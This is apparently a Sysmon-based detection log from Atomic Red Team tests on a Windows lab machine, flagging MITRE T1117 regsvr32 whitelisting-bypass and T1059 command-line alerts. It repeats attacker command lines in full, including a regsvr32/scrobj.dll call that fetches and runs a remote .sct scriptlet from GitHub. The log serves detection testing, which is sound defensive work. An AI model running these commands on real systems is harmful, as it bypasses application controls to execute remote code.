[T1117] Bypassing Application Whitelisting,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"
1
5
4
1
0
0x8000000000000000
4044
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.831
747F3D96-D97A-5D31-0000-00109DDC3800
3564
C:\Windows\SysWOW64\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
1
5
4
1
0
0x8000000000000000
4044
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.831
747F3D96-D97A-5D31-0000-00109DDC3800
3564
C:\Windows\SysWOW64\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548026.893188,2019-07-19T18:53:46.893188+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( "C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
1
5
4
1
0
0x8000000000000000
4044
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.831
747F3D96-D97A-5D31-0000-00109DDC3800
3564
C:\Windows\SysWOW64\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\syswow64\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563548026.848703,2019-07-19T18:53:46.848703+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"
3
5
4
3
0
0x8000000000000000
4043
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
Suspicious NetCon
2019-07-19 14:53:40.896
747F3D96-D978-5D31-0000-0010EB313800
2076
C:\Windows\System32\regsvr32.exe
MSEDGEWIN10\IEUser
tcp
true
false
10.0.2.15
MSEDGEWIN10.home
49728
false
151.101.0.133
443
https
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548026.589404,2019-07-19T18:53:46.589404+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4042
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.405
747F3D96-D97A-5D31-0000-001089BD3800
7148
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548026.565529,2019-07-19T18:53:46.565529+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1,"
1
5
4
1
0
0x8000000000000000
4041
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:46.135
747F3D96-D97A-5D31-0000-00105DA83800
4336
C:\Windows\System32\calc.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Calculator
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\calc.exe"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
747F3D96-D978-5D31-0000-0010EB313800
2076
C:\Windows\System32\regsvr32.exe
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll)",1,"
1
5
4
1
0
0x8000000000000000
4038
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:44.049
747F3D96-D978-5D31-0000-0010EB313800
2076
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D978-5D31-0000-0010442F3800
2832
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4038
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:44.049
747F3D96-D978-5D31-0000-0010EB313800
2076
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D978-5D31-0000-0010442F3800
2832
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.117123,2019-07-19T18:53:44.117123+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4038
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:44.049
747F3D96-D978-5D31-0000-0010EB313800
2076
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D978-5D31-0000-0010442F3800
2832
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1,"
1
5
4
1
0
0x8000000000000000
4037
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:44.010
747F3D96-D978-5D31-0000-0010442F3800
2832
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548024.054072,2019-07-19T18:53:44.054072+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll" ),1,"
1
5
4
1
0
0x8000000000000000
4037
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:44.010
747F3D96-D978-5D31-0000-0010442F3800
2832
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548024.026061,2019-07-19T18:53:44.026061+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4036
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:43.460
747F3D96-D977-5D31-0000-0010771B3800
1476
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548023.574378,2019-07-19T18:53:43.574378+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( "C:\Windows\System32\calc.exe" ),1,"
1
5
4
1
0
0x8000000000000000
4035
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:43.339
747F3D96-D977-5D31-0000-00100A0E3800
3848
C:\Windows\System32\calc.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Calculator
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\System32\calc.exe"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729
747F3D96-D976-5D31-0000-001093EA3700
2332
C:\Windows\System32\regsvr32.exe
regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll)",1,"
1
5
4
1
0
0x8000000000000000
4033
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.834
747F3D96-D976-5D31-0000-001093EA3700
2332
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D976-5D31-0000-001041E83700
4444
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4033
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.834
747F3D96-D976-5D31-0000-001093EA3700
2332
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D976-5D31-0000-001041E83700
4444
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.964349,2019-07-19T18:53:42.964349+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll ),1,"
1
5
4
1
0
0x8000000000000000
4033
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.834
747F3D96-D976-5D31-0000-001093EA3700
2332
C:\Windows\System32\regsvr32.exe
10.0.17763.1 (WinBuild.160101.0800)
Microsoft(C) Register Server
Microsoft® Windows® Operating System
Microsoft Corporation
regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F
747F3D96-D976-5D31-0000-001041E83700
4444
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1,"
1
5
4
1
0
0x8000000000000000
4032
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.803
747F3D96-D976-5D31-0000-001041E83700
4444
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.841951,2019-07-19T18:53:42.841951+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll" ),1,"
1
5
4
1
0
0x8000000000000000
4032
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.803
747F3D96-D976-5D31-0000-001041E83700
4444
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.815966,2019-07-19T18:53:42.815966+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4031
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.384
747F3D96-D976-5D31-0000-0010D8D53700
6312
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.301844,2019-07-19T18:53:42.301844+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "arp -a" ),1,"
1
5
4
1
0
0x8000000000000000
4029
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.259
747F3D96-D976-5D31-0000-0010DBCC3700
6292
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c "arp -a"
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548022.276408,2019-07-19T18:53:42.276408+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4028
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:53:42.051
747F3D96-D976-5D31-0000-00104AC63700
6412
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
747F3D96-D6F7-5D31-0000-00104ACE2500
3912
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell
",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548266.828722,2019-07-19T18:57:46.828722+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
1
5
4
1
0
0x8000000000000000
4088
Microsoft-Windows-Sysmon/Operational
MSEDGEWIN10
2019-07-19 14:57:46.531
747F3D96-DA6A-5D31-0000-001025AD3E00
4552
C:\Windows\System32\cmd.exe
10.0.17763.1 (WinBuild.160101.0800)
Windows Command Processor
Microsoft® Windows® Operating System
Microsoft Corporation
"C:\Windows\system32\cmd.exe" /c
C:\AtomicRedTeam\
MSEDGEWIN10\IEUser
747F3D96-D4B4-5D31-0000-002051090500
0x50951
1
High
